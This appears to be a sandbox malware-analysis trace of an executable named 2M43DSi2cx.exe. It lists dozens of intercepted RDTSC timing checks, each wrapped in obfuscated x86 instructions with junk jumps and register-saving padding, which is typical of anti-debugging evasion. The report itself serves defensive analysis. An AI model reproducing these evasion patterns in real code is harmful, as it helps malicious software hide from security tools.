Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0AAA second address: 6EC0B41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+0000008Ch] 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F2BDCD5A7B5h 0x00000015 add ch, FFFFFF86h 0x00000018 jmp 00007F2BDCD5A7B1h 0x0000001d popfd 0x0000001e push eax 0x0000001f pushfd 0x00000020 jmp 00007F2BDCD5A7B7h 0x00000025 sub cx, 66BEh 0x0000002a jmp 00007F2BDCD5A7B9h 0x0000002f popfd 0x00000030 pop ecx 0x00000031 popad 0x00000032 mov dword ptr [esi+34h], eax 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 jmp 00007F2BDCD5A7B8h 0x0000003d mov cx, 1901h 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0B41 second address: 6EC0C2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDC8ABB27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+18h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F2BDC8ABB24h 0x00000013 adc ah, 00000078h 0x00000016 jmp 00007F2BDC8ABB1Bh 0x0000001b popfd 0x0000001c mov bh, ah 0x0000001e popad 0x0000001f mov dword ptr [esi+38h], eax 0x00000022 jmp 00007F2BDC8ABB1Bh 0x00000027 mov eax, dword ptr [ebx+1Ch] 0x0000002a jmp 00007F2BDC8ABB26h 0x0000002f mov dword ptr [esi+3Ch], eax 0x00000032 pushad 0x00000033 mov bh, cl 0x00000035 push edi 0x00000036 mov ax, 6495h 0x0000003a pop eax 0x0000003b popad 0x0000003c mov eax, dword ptr [ebx+20h] 0x0000003f jmp 00007F2BDC8ABB21h 0x00000044 mov dword ptr [esi+40h], eax 0x00000047 jmp 00007F2BDC8ABB1Eh 0x0000004c lea eax, dword ptr [ebx+00000080h] 0x00000052 jmp 00007F2BDC8ABB20h 0x00000057 push 00000001h 0x00000059 jmp 00007F2BDC8ABB20h 0x0000005e nop 0x0000005f jmp 00007F2BDC8ABB20h 0x00000064 push eax 0x00000065 push eax 0x00000066 push edx 0x00000067 jmp 00007F2BDC8ABB1Eh 0x0000006c rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0C2A second address: 6EC0CB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F2BDCD5A7B6h 0x0000000f lea eax, dword ptr [ebp-10h] 0x00000012 jmp 00007F2BDCD5A7B0h 0x00000017 nop 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F2BDCD5A7AEh 0x0000001f jmp 00007F2BDCD5A7B5h 0x00000024 popfd 0x00000025 pushfd 0x00000026 jmp 00007F2BDCD5A7B0h 0x0000002b adc ch, 00000078h 0x0000002e jmp 00007F2BDCD5A7ABh 0x00000033 popfd 0x00000034 popad 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0CB2 second address: 6EC0CB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0CB6 second address: 6EC0CBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0CBC second address: 6EC0CC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0CC2 second address: 6EC0CC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0CC6 second address: 6EC0CCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0CCA second address: 6EC0CE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007F2BDCD5A7ACh 0x00000011 pop ecx 0x00000012 mov ah, dl 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0D1C second address: 6EC0D20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0D20 second address: 6EC0D26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0D26 second address: 6EC0D4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop ebx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test edi, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov dx, D80Ch 0x00000011 jmp 00007F2BDC8ABB25h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0D4D second address: 6EC0D8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 jmp 00007F2BDCD5A7B8h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e js 00007F2C4D3790FBh 0x00000014 jmp 00007F2BDCD5A7B0h 0x00000019 mov eax, dword ptr [ebp-0Ch] 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0D8D second address: 6EC0D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0D91 second address: 6EC0DAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0DAE second address: 6EC0DF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, A3E2h 0x00000007 pushfd 0x00000008 jmp 00007F2BDC8ABB23h 0x0000000d xor ecx, 765BECDEh 0x00000013 jmp 00007F2BDC8ABB29h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov dword ptr [esi+04h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0DF5 second address: 6EC0DF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0DF9 second address: 6EC0DFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0DFF second address: 6EC0E31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+78h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2BDCD5A7B7h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0E31 second address: 6EC0E37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0E37 second address: 6EC0E9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 00000001h 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F2BDCD5A7B4h 0x00000014 sbb ax, 50C8h 0x00000019 jmp 00007F2BDCD5A7ABh 0x0000001e popfd 0x0000001f movzx ecx, bx 0x00000022 popad 0x00000023 push edx 0x00000024 jmp 00007F2BDCD5A7B0h 0x00000029 mov dword ptr [esp], eax 0x0000002c pushad 0x0000002d jmp 00007F2BDCD5A7AEh 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0F8A second address: 6EC0F9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2BDC8ABB21h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0F9F second address: 6EC0FA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0FA3 second address: 6EC0FCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, eax 0x0000000a jmp 00007F2BDC8ABB1Dh 0x0000000f test edi, edi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F2BDC8ABB1Dh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0FCB second address: 6EC0FFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F2C4D378E7Fh 0x0000000f jmp 00007F2BDCD5A7AEh 0x00000014 mov eax, dword ptr [ebp-04h] 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0FFD second address: 6EC1001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1001 second address: 6EC1005 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1005 second address: 6EC100B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC100B second address: 6EC1011 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1011 second address: 6EC1015 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1015 second address: 6EC1075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+08h], eax 0x0000000b pushad 0x0000000c mov dx, si 0x0000000f push ecx 0x00000010 pushfd 0x00000011 jmp 00007F2BDCD5A7ABh 0x00000016 or eax, 4B33722Eh 0x0000001c jmp 00007F2BDCD5A7B9h 0x00000021 popfd 0x00000022 pop eax 0x00000023 popad 0x00000024 lea eax, dword ptr [ebx+70h] 0x00000027 jmp 00007F2BDCD5A7B7h 0x0000002c push 00000001h 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1075 second address: 6EC1090 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDC8ABB27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1090 second address: 6EC1096 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1096 second address: 6EC109A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC109A second address: 6EC10E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f call 00007F2BDCD5A7ABh 0x00000014 pop ecx 0x00000015 pushfd 0x00000016 jmp 00007F2BDCD5A7B9h 0x0000001b jmp 00007F2BDCD5A7ABh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC10E2 second address: 6EC1175 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDC8ABB29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F2BDC8ABB21h 0x0000000f nop 0x00000010 jmp 00007F2BDC8ABB1Eh 0x00000015 lea eax, dword ptr [ebp-18h] 0x00000018 jmp 00007F2BDC8ABB20h 0x0000001d nop 0x0000001e pushad 0x0000001f mov bx, cx 0x00000022 pushfd 0x00000023 jmp 00007F2BDC8ABB1Ah 0x00000028 and cx, 8DE8h 0x0000002d jmp 00007F2BDC8ABB1Bh 0x00000032 popfd 0x00000033 popad 0x00000034 push eax 0x00000035 jmp 00007F2BDC8ABB29h 0x0000003a nop 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e mov ebx, eax 0x00000040 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1175 second address: 6EC1182 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 mov ecx, 4FF14251h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC11A5 second address: 6EC11D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDC8ABB20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F2BDC8ABB27h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC11D4 second address: 6EC124E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F2BDCD5A7B3h 0x00000014 and eax, 30BA635Eh 0x0000001a jmp 00007F2BDCD5A7B9h 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007F2BDCD5A7B0h 0x00000026 and ecx, 30300F58h 0x0000002c jmp 00007F2BDCD5A7ABh 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC124E second address: 6EC1305 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 mov cx, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F2C4CEC9F6Ch 0x00000011 pushad 0x00000012 call 00007F2BDC8ABB23h 0x00000017 jmp 00007F2BDC8ABB28h 0x0000001c pop ecx 0x0000001d mov cx, dx 0x00000020 popad 0x00000021 mov eax, dword ptr [ebp-14h] 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007F2BDC8ABB23h 0x0000002b sub ecx, 57C198DEh 0x00000031 jmp 00007F2BDC8ABB29h 0x00000036 popfd 0x00000037 movzx eax, dx 0x0000003a popad 0x0000003b mov ecx, esi 0x0000003d jmp 00007F2BDC8ABB23h 0x00000042 mov dword ptr [esi+0Ch], eax 0x00000045 jmp 00007F2BDC8ABB26h 0x0000004a mov edx, 775606ECh 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1305 second address: 6EC1309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1309 second address: 6EC1326 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDC8ABB29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1326 second address: 6EC13AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 pushfd 0x00000007 jmp 00007F2BDCD5A7B8h 0x0000000c add cx, C7F8h 0x00000011 jmp 00007F2BDCD5A7ABh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a sub eax, eax 0x0000001c pushad 0x0000001d jmp 00007F2BDCD5A7B5h 0x00000022 mov ah, 90h 0x00000024 popad 0x00000025 lock cmpxchg dword ptr [edx], ecx 0x00000029 jmp 00007F2BDCD5A7B3h 0x0000002e pop edi 0x0000002f jmp 00007F2BDCD5A7B6h 0x00000034 test eax, eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC13AA second address: 6EC13AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC13AE second address: 6EC13B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC13B2 second address: 6EC13B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC13B8 second address: 6EC13BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC13BE second address: 6EC13C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC13C2 second address: 6EC13D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F2C4D378AB8h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC13D6 second address: 6EC13DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC13DA second address: 6EC13E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC13E0 second address: 6EC13F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2BDC8ABB1Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC13F1 second address: 6EC13F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC13F5 second address: 6EC1484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c movsx edx, ax 0x0000000f jmp 00007F2BDC8ABB24h 0x00000014 popad 0x00000015 mov eax, dword ptr [esi] 0x00000017 jmp 00007F2BDC8ABB20h 0x0000001c mov dword ptr [edx], eax 0x0000001e jmp 00007F2BDC8ABB20h 0x00000023 mov eax, dword ptr [esi+04h] 0x00000026 jmp 00007F2BDC8ABB20h 0x0000002b mov dword ptr [edx+04h], eax 0x0000002e pushad 0x0000002f mov cl, 58h 0x00000031 mov ax, di 0x00000034 popad 0x00000035 mov eax, dword ptr [esi+08h] 0x00000038 jmp 00007F2BDC8ABB25h 0x0000003d mov dword ptr [edx+08h], eax 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F2BDC8ABB1Dh 0x00000047 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1484 second address: 6EC1529 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2BDCD5A7B7h 0x00000008 pushfd 0x00000009 jmp 00007F2BDCD5A7B8h 0x0000000e sbb ax, A488h 0x00000013 jmp 00007F2BDCD5A7ABh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov eax, dword ptr [esi+0Ch] 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F2BDCD5A7B4h 0x00000026 adc ax, 06E8h 0x0000002b jmp 00007F2BDCD5A7ABh 0x00000030 popfd 0x00000031 mov edi, ecx 0x00000033 popad 0x00000034 mov dword ptr [edx+0Ch], eax 0x00000037 jmp 00007F2BDCD5A7B2h 0x0000003c mov eax, dword ptr [esi+10h] 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F2BDCD5A7B7h 0x00000046 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1529 second address: 6EC154A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 929Ah 0x00000007 jmp 00007F2BDC8ABB1Bh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [edx+10h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov ecx, edx 0x00000017 movsx edx, cx 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC154A second address: 6EC1561 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+14h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov di, cx 0x00000012 mov cx, 6D11h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1561 second address: 6EC1567 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1567 second address: 6EC156B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC156B second address: 6EC156F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC156F second address: 6EC15F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+14h], eax 0x0000000b jmp 00007F2BDCD5A7B5h 0x00000010 mov eax, dword ptr [esi+18h] 0x00000013 jmp 00007F2BDCD5A7AEh 0x00000018 mov dword ptr [edx+18h], eax 0x0000001b jmp 00007F2BDCD5A7B0h 0x00000020 mov eax, dword ptr [esi+1Ch] 0x00000023 jmp 00007F2BDCD5A7B0h 0x00000028 mov dword ptr [edx+1Ch], eax 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e mov bl, 11h 0x00000030 pushfd 0x00000031 jmp 00007F2BDCD5A7B6h 0x00000036 adc ecx, 47B0F788h 0x0000003c jmp 00007F2BDCD5A7ABh 0x00000041 popfd 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC15F8 second address: 6EC164E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDC8ABB29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+20h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov cx, dx 0x00000012 pushfd 0x00000013 jmp 00007F2BDC8ABB1Fh 0x00000018 and cx, C92Eh 0x0000001d jmp 00007F2BDC8ABB29h 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC164E second address: 6EC1654 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1654 second address: 6EC1658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1658 second address: 6EC165C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC165C second address: 6EC1696 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+20h], eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushfd 0x0000000f jmp 00007F2BDC8ABB1Bh 0x00000014 adc esi, 760D9F3Eh 0x0000001a jmp 00007F2BDC8ABB29h 0x0000001f popfd 0x00000020 rdtsc
